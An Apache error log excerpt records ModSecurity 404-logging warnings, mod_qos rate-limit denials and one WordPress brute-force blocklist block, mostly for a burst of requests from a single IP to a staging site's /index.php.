[Tue May 26 19:55:06.319967 2026] [security2:error] [pid 93868:tid 94277] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtQEqK9k_ZUB2Vp25OvgAAAaI"]
[Tue May 26 19:55:06.332509 2026] [security2:error] [pid 93868:tid 94258] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtQEqK9k_ZUB2Vp25OsQAAAY8"]
[Tue May 26 19:55:06.332790 2026] [security2:error] [pid 93868:tid 94317] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtQEqK9k_ZUB2Vp25OpQAAAco"]
[Tue May 26 19:55:06.342746 2026] [security2:error] [pid 93868:tid 94350] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtQEqK9k_ZUB2Vp25OzQAAAes"]
[Tue May 26 19:55:06.356080 2026] [security2:error] [pid 93576:tid 93806] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtQGDRMqfxdEDkoszWbgAAAF4"]
[Tue May 26 19:55:06.356393 2026] [security2:error] [pid 93868:tid 94322] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtQUqK9k_ZUB2Vp25O9QAAAc8"]
[Tue May 26 19:55:06.363670 2026] [security2:error] [pid 93868:tid 94278] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtQEqK9k_ZUB2Vp25OrwAAAaM"]
[Tue May 26 19:55:06.370965 2026] [security2:error] [pid 93576:tid 93810] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtQGDRMqfxdEDkoszWbAAAAGI"]
[Tue May 26 19:55:06.374378 2026] [security2:error] [pid 93576:tid 93811] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtQGDRMqfxdEDkoszWXQAAAGM"]
[Tue May 26 19:55:06.380847 2026] [security2:error] [pid 93576:tid 93804] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtQWDRMqfxdEDkoszWjAAAAFw"]
[Tue May 26 19:55:06.386608 2026] [security2:error] [pid 93868:tid 94261] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtQEqK9k_ZUB2Vp25OtgAAAZI"]
[Tue May 26 19:55:06.395933 2026] [security2:error] [pid 93576:tid 93734] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtQWDRMqfxdEDkoszWigAAABY"]
[Tue May 26 19:55:06.398347 2026] [security2:error] [pid 93576:tid 93805] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtQWDRMqfxdEDkoszWhgAAAF0"]
[Tue May 26 19:55:06.409055 2026] [security2:error] [pid 93868:tid 94312] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtQUqK9k_ZUB2Vp25O9gAAAcU"]
[Tue May 26 19:55:06.409433 2026] [security2:error] [pid 93868:tid 94295] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtQUqK9k_ZUB2Vp25O-AAAAbQ"]
[Tue May 26 19:55:06.413605 2026] [security2:error] [pid 93576:tid 93790] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtQWDRMqfxdEDkoszWhAAAAE4"]
[Tue May 26 19:55:06.414249 2026] [security2:error] [pid 93576:tid 93814] [client 178.20.43.173:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWtQmDRMqfxdEDkoszWsgAAAGY"], referer: https://anujtradingco.com/top-deejay-headphones/?unapproved=1126632&moderation-hash=59b6df6061510784a9028b48d419324d
[Tue May 26 19:55:06.419938 2026] [security2:error] [pid 93868:tid 94324] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtQEqK9k_ZUB2Vp25OuQAAAdE"]
[Tue May 26 19:55:06.439722 2026] [security2:error] [pid 93868:tid 94286] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtQUqK9k_ZUB2Vp25O7QAAAas"]
[Tue May 26 19:55:06.443016 2026] [security2:error] [pid 93576:tid 93824] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtQWDRMqfxdEDkoszWkgAAAHA"]
[Tue May 26 19:55:06.452447 2026] [security2:error] [pid 93576:tid 93727] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtQWDRMqfxdEDkoszWhwAAAA8"]
[Tue May 26 19:55:06.453489 2026] [security2:error] [pid 93868:tid 94271] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtQUqK9k_ZUB2Vp25PEgAAAZw"]
[Tue May 26 19:55:06.454261 2026] [security2:error] [pid 93868:tid 94364] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtQUqK9k_ZUB2Vp25PBAAAAfk"]
[Tue May 26 19:55:06.454493 2026] [security2:error] [pid 93868:tid 94297] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtQUqK9k_ZUB2Vp25PBgAAAbY"]
[Tue May 26 19:55:06.458996 2026] [security2:error] [pid 93868:tid 94311] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtQUqK9k_ZUB2Vp25PDgAAAcQ"]
[Tue May 26 19:55:06.461117 2026] [security2:error] [pid 93868:tid 94337] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtQUqK9k_ZUB2Vp25O_QAAAd4"]
[Tue May 26 19:55:07.281522 2026] [security2:error] [pid 93576:tid 93758] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtQWDRMqfxdEDkoszWlAAAAC4"]
[Tue May 26 19:55:07.283614 2026] [security2:error] [pid 93868:tid 94276] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtQUqK9k_ZUB2Vp25PHgAAAaE"]
[Tue May 26 19:55:07.287229 2026] [security2:error] [pid 93576:tid 93807] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtQWDRMqfxdEDkoszWiwAAAF8"]
[Tue May 26 19:55:07.296940 2026] [security2:error] [pid 93868:tid 94292] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtQUqK9k_ZUB2Vp25PCQAAAbE"]
[Tue May 26 19:55:07.298422 2026] [security2:error] [pid 93868:tid 94301] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtQUqK9k_ZUB2Vp25PDQAAAbo"]
[Tue May 26 19:55:07.300822 2026] [security2:error] [pid 93868:tid 94342] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtQUqK9k_ZUB2Vp25O_gAAAeM"]
[Tue May 26 19:55:07.317782 2026] [security2:error] [pid 93576:tid 93783] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtQWDRMqfxdEDkoszWmwAAAEc"]
[Tue May 26 19:55:07.319215 2026] [qos:error] [pid 93576:tid 93718] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtQ2DRMqfxdEDkoszW7AAAAAY
[Tue May 26 19:55:07.326556 2026] [qos:error] [pid 93576:tid 93790] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtQ2DRMqfxdEDkoszW8gAAAE4
[Tue May 26 19:55:07.333272 2026] [qos:error] [pid 93576:tid 93789] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtQ2DRMqfxdEDkoszW8wAAAE0
[Tue May 26 19:55:07.333387 2026] [qos:error] [pid 93868:tid 94302] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtQ0qK9k_ZUB2Vp25PqAAAAbs
[Tue May 26 19:55:07.333406 2026] [qos:error] [pid 93576:tid 93814] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=50.87.254.159, id=ahWtQ2DRMqfxdEDkoszW9AAAAGY
[Tue May 26 19:55:07.338658 2026] [security2:error] [pid 93868:tid 94333] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtQUqK9k_ZUB2Vp25PIAAAAdo"]
[Tue May 26 19:55:07.343746 2026] [security2:error] [pid 93576:tid 93751] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtQmDRMqfxdEDkoszWugAAACc"]
[Tue May 26 19:55:07.353436 2026] [security2:error] [pid 93868:tid 94355] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtQkqK9k_ZUB2Vp25PXAAAAfA"]
[Tue May 26 19:55:07.355849 2026] [security2:error] [pid 93868:tid 94341] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtQUqK9k_ZUB2Vp25PIgAAAeI"]
[Tue May 26 19:55:07.357813 2026] [security2:error] [pid 93868:tid 94259] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtQUqK9k_ZUB2Vp25PCAAAAZA"]
[Tue May 26 19:55:07.361393 2026] [security2:error] [pid 93868:tid 94330] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtQUqK9k_ZUB2Vp25PKgAAAdc"]
[Tue May 26 19:55:07.367471 2026] [security2:error] [pid 93868:tid 94265] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtQUqK9k_ZUB2Vp25PFwAAAZY"]
[Tue May 26 19:55:07.368250 2026] [security2:error] [pid 93576:tid 93831] [client 43.172.196.170:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtQWDRMqfxdEDkoszWogAAAHc"]
[Tue May 26 19:55:07.383124 2026] [security2:error] [pid 93868:tid 94300] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtQkqK9k_ZUB2Vp25PWwAAAbk"]
[Tue May 26 19:55:07.383929 2026] [security2:error] [pid 93576:tid 93785] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtQmDRMqfxdEDkoszWuAAAAEk"]
[Tue May 26 19:55:07.384921 2026] [security2:error] [pid 93576:tid 93794] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtQmDRMqfxdEDkoszWuQAAAFI"]
[Tue May 26 19:55:07.397651 2026] [security2:error] [pid 93868:tid 94358] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtQUqK9k_ZUB2Vp25PGAAAAfM"]
[Tue May 26 19:55:07.398472 2026] [security2:error] [pid 93576:tid 93799] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtQmDRMqfxdEDkoszWvwAAAFc"]
[Tue May 26 19:55:07.399358 2026] [security2:error] [pid 93576:tid 93757] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtQmDRMqfxdEDkoszWtwAAAC0"]
[Tue May 26 19:55:07.411706 2026] [security2:error] [pid 93868:tid 94327] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtQkqK9k_ZUB2Vp25PZQAAAdQ"]
[Tue May 26 19:55:07.414476 2026] [security2:error] [pid 93868:tid 94357] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtQkqK9k_ZUB2Vp25PUgAAAfI"]
[Tue May 26 19:55:07.423154 2026] [security2:error] [pid 93868:tid 94272] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtQkqK9k_ZUB2Vp25PYAAAAZ0"]
[Tue May 26 19:55:07.427781 2026] [security2:error] [pid 93576:tid 93736] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtQWDRMqfxdEDkoszWnwAAABg"]
[Tue May 26 19:55:07.428670 2026] [security2:error] [pid 93868:tid 94304] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtQkqK9k_ZUB2Vp25PXwAAAb0"]
[Tue May 26 19:55:07.428778 2026] [security2:error] [pid 93868:tid 94282] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtQkqK9k_ZUB2Vp25PaAAAAac"]
[Tue May 26 19:55:07.432889 2026] [security2:error] [pid 93868:tid 94260] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtQUqK9k_ZUB2Vp25PMQAAAZE"]
[Tue May 26 19:55:07.433427 2026] [security2:error] [pid 93868:tid 94349] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtQkqK9k_ZUB2Vp25PXgAAAeo"]
[Tue May 26 19:55:07.436050 2026] [security2:error] [pid 93868:tid 94370] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtQkqK9k_ZUB2Vp25PZwAAAf8"]
[Tue May 26 19:55:07.439517 2026] [security2:error] [pid 93868:tid 94263] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtQkqK9k_ZUB2Vp25PXQAAAZQ"]
[Tue May 26 19:55:07.647427 2026] [security2:error] [pid 93576:tid 93801] [client 178.20.43.173:64864] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 173.43.20.178.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahWtQ2DRMqfxdEDkoszW-AAAAFk"], referer: https://anujtradingco.com/wp-login.php?action=register
[Tue May 26 19:55:07.676251 2026] [qos:error] [pid 93576:tid 93779] [client 45.148.10.120:49132] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtQ2DRMqfxdEDkoszXHgAAAEM
[Tue May 26 19:55:07.682652 2026] [qos:error] [pid 93576:tid 93753] [client 45.148.10.120:49082] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtQ2DRMqfxdEDkoszXHwAAACk
[Tue May 26 19:55:07.684431 2026] [qos:error] [pid 93868:tid 94301] [client 45.148.10.120:49188] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtQ0qK9k_ZUB2Vp25P3gAAAbo
[Tue May 26 19:55:07.702683 2026] [qos:error] [pid 93868:tid 94260] [client 45.148.10.120:49118] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtQ0qK9k_ZUB2Vp25P3wAAAZE
[Tue May 26 19:55:07.712384 2026] [qos:error] [pid 93868:tid 94303] [client 45.148.10.120:49092] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtQ0qK9k_ZUB2Vp25P4AAAAbw
[Tue May 26 19:55:07.720466 2026] [qos:error] [pid 93868:tid 94259] [client 45.148.10.120:49104] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtQ0qK9k_ZUB2Vp25P4QAAAZA
[Tue May 26 19:55:07.728245 2026] [qos:error] [pid 93868:tid 94269] [client 45.148.10.120:49164] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtQ0qK9k_ZUB2Vp25P4gAAAZo
[Tue May 26 19:55:07.729436 2026] [qos:error] [pid 93868:tid 94284] [client 45.148.10.120:49206] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtQ0qK9k_ZUB2Vp25P4wAAAak
[Tue May 26 19:55:07.739481 2026] [qos:error] [pid 93868:tid 94349] [client 45.148.10.120:49146] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtQ0qK9k_ZUB2Vp25P5AAAAeo
[Tue May 26 19:55:07.746236 2026] [qos:error] [pid 93868:tid 94361] [client 45.148.10.120:49154] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtQ0qK9k_ZUB2Vp25P5QAAAfY
[Tue May 26 19:55:07.801098 2026] [security2:error] [pid 93868:tid 94308] [client 57.141.2.7:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWtQ0qK9k_ZUB2Vp25PmQAAAcE"]
[Tue May 26 19:55:08.259552 2026] [qos:error] [pid 93576:tid 93824] [client 45.148.10.120:49132] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtRGDRMqfxdEDkoszXIAAAAHA
[Tue May 26 19:55:08.262952 2026] [qos:error] [pid 93576:tid 93732] [client 45.148.10.120:49082] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtRGDRMqfxdEDkoszXIQAAABQ
[Tue May 26 19:55:08.264053 2026] [qos:error] [pid 93868:tid 94293] [client 45.148.10.120:49188] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtREqK9k_ZUB2Vp25P7wAAAbI
[Tue May 26 19:55:08.264807 2026] [qos:error] [pid 93868:tid 94326] [client 45.148.10.120:49118] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtREqK9k_ZUB2Vp25P8AAAAdM
[Tue May 26 19:55:08.279111 2026] [qos:error] [pid 93576:tid 93759] [client 43.172.196.170:38628] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=43.172.196.170, id=ahWtRGDRMqfxdEDkoszXIgAAAC8, referer: https://staging.unsobered.com/tag/singapore/feed
